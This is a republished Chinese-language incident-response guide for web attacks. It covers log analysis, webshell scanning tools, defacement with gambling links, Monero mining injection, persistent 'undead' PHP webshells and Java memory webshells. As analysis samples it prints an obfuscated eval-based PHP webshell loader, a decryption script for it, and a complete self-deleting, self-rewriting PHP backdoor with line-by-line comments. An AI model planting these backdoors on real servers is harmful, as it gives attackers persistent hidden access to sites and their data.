扫码领资料
获网安教程
# web攻击应急响应 ## 写在前面 随着 Web 技术不断发展,Web 被应用得越来越广泛,现在很多企业对外就一个网站来提供服务,所以网站的业务行为,安全性显得非常重要。当网页发生篡改、服务器...
文章来源: https://forum.butian.net/share/838文章作者:Honeypot如有侵权请您联系我们,我们会进行删除并致歉
web攻击应急响应
写在前面
日志文件格式与保存路径
在不同环境不同管理员搭建的网站日志保存的位置和格式会有所不同,但日志保存的位置还是有一定的规律,此时需要我们多去收集。日志的格式这个得根据实际情况分析,而在有些管理员设置日志文件的时候,可能将所有的日志信息保存在一个文本中,另外一种可能是管理员按时间或者按一定的规律将日志信息保存在不同的文本中,后一种见得更多。
web日志分析
单个文件分析
多个文件分析
1、D盾_Web查杀
阿D出品,使用自行研发不分扩展名的代码分析引擎,能分析更为隐藏的 WebShell 后门行为。
兼容性:只提供 Windows 版本。
工具下载地址:http://www.d99net.net
2、百度 WEBDIR+
下一代 WebShell 检测引擎,采用先进的动态监测技术,结合多种引擎零规则查杀。
兼容性:提供在线查杀木马,免费开放 API 支持批量检测。
在线查杀地址:https://scanner.baidu.com
3、河马
专注 WebShell 查杀研究,拥有海量 WebShell 样本和自主查杀技术,采用传统特征+云端大数据双引擎的查杀技术。查杀速度快、精度高、误报低。
兼容性:支持 Windows、Linux,支持在线查杀。
官方网站:https://www.shellpub.com
4、Web Shell Detector
Web Shell Detector 具有 WebShell 签名数据库,可帮助识别高达 99% 的 WebShell。
兼容性:提供 PHP、Python 脚本,可跨平台,在线检测。
官方网站:http://www.shelldetector.com
github项目地址:https://github.com/emposha/PHP-Shell-Detector
5、PHP Malware Finder
PHP-malware-finder 是一款优秀的检测webshell和恶意软件混淆代码的工具
兼容性:提供Linux 版本,Windows 暂不支持。
GitHub 项目地址:https://github.com/jvoisin/php-malware-finder
6、在线 WebShell 查杀工具
在线查杀地址:http://tools.bugscaner.com/killwebshell
<?php
$OOO0O0O00=__FILE__;$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');$OO00O0000=56;$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$O0O0000O0='OOO0000O0';eval(($$O0O0000O0('JE9PME9PMDAwMD0kT09PMDAwMDAwezE3fS4kT09PMDAwMDAwezEyfS4kT09PMDAwMDAwezE4fS4kT09PMDAwMDAwezV9LiRPT08wMDAwMDB7MTl9O2lmKCEwKSRPMDAwTzBPMDA9JE9PME9PMDAwMCgkT09PME8wTzAwLCdyYicpOyRPTzBPTzAwME89JE9PTzAwMDAwMHsxN30uJE9PTzAwMDAwMHsyMH0uJE9PTzAwMDAwMHs1fS4kT09PMDAwMDAwezl9LiRPT08wMDAwMDB7MTZ9OyRPTzBPTzAwTzA9JE9PTzAwMDAwMHsxNH0uJE9PTzAwMDAwMHswfS4kT09PMDAwMDAwezIwfS4kT09PMDAwMDAwezB9LiRPT08wMDAwMDB7MjB9OyRPTzBPTzAwME8oJE8wMDBPME8wMCwxMjU5KTskT08wME8wME8wPSgkT09PMDAwME8wKCRPTzBPTzAwTzAoJE9PME9PMDAwTygkTzAwME8wTzAwLDM4MCksJ0VudGVyeW91d2toUkhZS05XT1VUQWFCYkNjRGRGZkdnSWlKakxsTW1QcFFxU3NWdlh4WnowMTIzNDU2Nzg5Ky89JywnQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0NTY3ODkrLycpKSk7ZXZhbCgkT08wME8wME8wKTs=')));return;?>
kr9NHenNHenNHe1zfukgFMaXdoyjcUImb19oUAxyb18mRtwmwJ4LT09NHr8XTzEXRJwmwJXPkr9NTzEXHenNHtILT08XT08XHr8XhtONTznNTzEXHr8Pkr8XHenNHr8XHtXLT08XHr8XHeEXhUXmOB50cbk5d3a3D2iUUylRTlfNaaOnCAkJW2YrcrcMO2fkDApQToxYdanXAbyTF1c2BuiDGjExHjH0YTC3KeLqRz0mRtfnWLYrOAcuUrlhU0xYTL9WAakTayaBa1icBMyJC2OlcMfPDBpqdo1Vd3nxFmY0fbc3Gul6HerZHzW1YjF4KUSvkZLphUL7cMYSd3YlhtONHeEXTznNHeEpK2a2CBXPkr9NHenNHenNHtL7wtOiNUEPwJrJbJkEwJLVk3Yzcbk0kzSLCUILb1nNA1OdDoyjD2aZbUL7
发现有大量类型一样的post请求,这很熟悉吧?这不就是密码爆破的日志么,此时按照思路来讲应该是上面的sqlmap注入没有成功,不然不会继续爆破,看看爆破的最后出现了与前面不一样的数字,那么说明成功了。并且在下面就开始大量的请求其他的接口了
<?php
/***********************************
*威盾PHP加密专家解密算法 By:Neeao
*http://Neeao.com
***********************************/
$filename="play-js.php";//要解密的文件
$lines = file($filename);//0,1,2行
//第一次base64解密
$content="";
if(preg_match("/O0O0000O0('.*')/",$lines[1],$y))
{
$content=str_replace("O0O0000O0('","",$y[0]);
$content=str_replace("')","",$content);
$content=base64_decode($content);
}
//第一次base64解密后的内容中查找密钥
$decode_key="";
if(preg_match("/),'.*',/",$content,$k))
{
$decode_key=str_replace("),'","",$k[0]);
$decode_key=str_replace("',","",$decode_key);
}
//查找要截取字符串长度
$str_length="";
if(preg_match("/,d*),/",$content,$k))
{
$str_length=str_replace("),","",$k[0]);
$str_length=str_replace(",","",$str_length);
}
//截取文件加密后的密文
$Secret=substr($lines[2],$str_length);
//echo $Secret;
//直接还原密文输出
echo "<?phpn".base64_decode(strtr($Secret,$decode_key,'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'))."?>";
?>
1、熟悉web日志的格式,以及常用搭建环境下日志文件保存的位置(推荐使用everthing快速搜索文件)
2、关注攻击者攻击的时间
3、关注攻击者添加的内容
4、关注攻击者的ip
5、关注攻击者的操作顺序
6、学会多个文件进行对比分析
7、收集常用的web攻击攻击指纹库(很多工具都有特定的指纹如sqlmap,蚁剑等)
8、在没有思路的情况下,试着自己先尝试可不可以进行利用
批量挂黑页应急响应
出现的特征
某网站被挂了非常多博彩链接,链接形式如下:
http://www.xxx.com/upload/structure/index.html
http://www.xxx.com/upload/neyyss/index.html
链接可以访问,直接访问物理路径也可以看到文件,但是打开网站目录并没有发现这些文件,这些文件到底藏在了哪?其实很多攻击者有的会帮文件隐藏起来。
访问这些链接,跳转到如图页面:
解决办法
门罗币恶意挖矿应急响应
出现的特征
利用XMR恶意挖矿,浏览器进程占用了较大的CPU资源,严重影响了网站的用户体验。
分析
通过获取恶意网页url,对网页页面进行分析,发现网站页面被植入在线门罗币挖矿代码:
解决办法
不死马应急响应
<?php
ignore_user_abort(true);//函数设置与客户机断开是否会终止脚本的执行。这里设置为true则忽略与用户的断开,即使与客户机断开脚本仍会执行
set_time_limit(0);//函数设置脚本最大执行时间。这里设置为0,即没有时间方面的限制
unlink(__FILE__);//删除文件本身,以起到隐蔽自身的作用
$file = 'index.php';//写入的后门文件名
$code='<?php if(md5($_GET["pass"])=="21232f297a57a5a743894a0e4a801fc3"){@eval($_POST[a];} ?>';//get提交的pass参数后面的值md5加密后是否与后面的值相等,可自行设置md5值
while(1){//一直循环
file_put_contents($file,$code);
usleep(5000);//循环内每隔usleep(5000),写新的后门文件
}
?>
解决办法
2、重启PHP等web服务
3、使用条件竞争法,什么是条件竞争呢?至需要将上面的code代码修改为其他代码,usleep低于对方不死马设置的值,运行该文件后就会生成文件名为index.php的文件,和上面一样,但是由于我们写的代码生成的速度更快,替换掉了上面的后门。(这是在未找到进程已经暂时不能重启的情况下)
内存马攻击应急响应
https://www.cnblogs.com/fxsec/p/15000570.html
https://www.freebuf.com/articles/web/274466.html
https://www.freebuf.com/articles/network/288602.html
排查内存马思路
为了确保内存马在各种环境下都可以访问,往往需要把filter匹配优先级调至最高,这在shiro反序列化中是刚需。但其他场景下就非必须,只能做一个可疑点。
jsp注入,日志中排查可疑jsp的访问请求,代码执行漏洞,排查中间件的error.log,查看是否有可疑的报错,判断注入时间和方法
内存马的Filter是动态注册的,所以在web.xml中肯定没有配置,这也是个可以的特征。但servlet 3.0引入了@WebFilter标签方便开发这动态注册Filter。这种情况也存在没有在web.xml中显式声明,这个特征可以作为较强的特征。
防御
实时检测与防御能力,容易被绕过而造成安全威胁。内存保护技术则包括硬件虚拟化技术、行为分析技术、关联分析技术,对于漏洞利用、动态枚举等都有很好的检测、防御能力,可以更好的解决内存马攻击的安全威胁。
解决办法
https://github.com/c0ny1/java-memshell-scanner
https://github.com/huoji120/DuckMemoryScan
找到内存马的进程即可,配合上面的进行删除
Beyond Compare工具的使用
下载地址:http://www.scootersoftware.com/download.php
软件使用示例,通过文件夹比较,找出文件夹中的差异内容。
双击 Beyond Compare ,打开软件主页,选择文件夹比较。
总结
1、对网站的代码,数据库经常的备份;
2、定时对网站进行扫描;
3、及时修复网站漏洞;
4、使用网站防火墙产品,如云waf,能够有效防护来自外界的恶意攻击,如sql注入、cc攻击、篡改、盗链、暗链、木马等多种攻击,有效防护网站安全;
5、关注新型的攻击方式;
6、关闭不必要的目录权限;
7、不轻易点击别人发过来的文件,泄露信息
经常更换复杂的密码,很多人的安全意识较薄弱,密码设置得非常简单。
在这里为了让大家也能够复现一遍,我已将日志上传。
链接:https://pan.baidu.com/s/1UPJvF9PpgO1JfSMt1soH_w
提取码:sb6e
声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。
原文始发于微信公众号(白帽子左一):web攻击应急响应
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论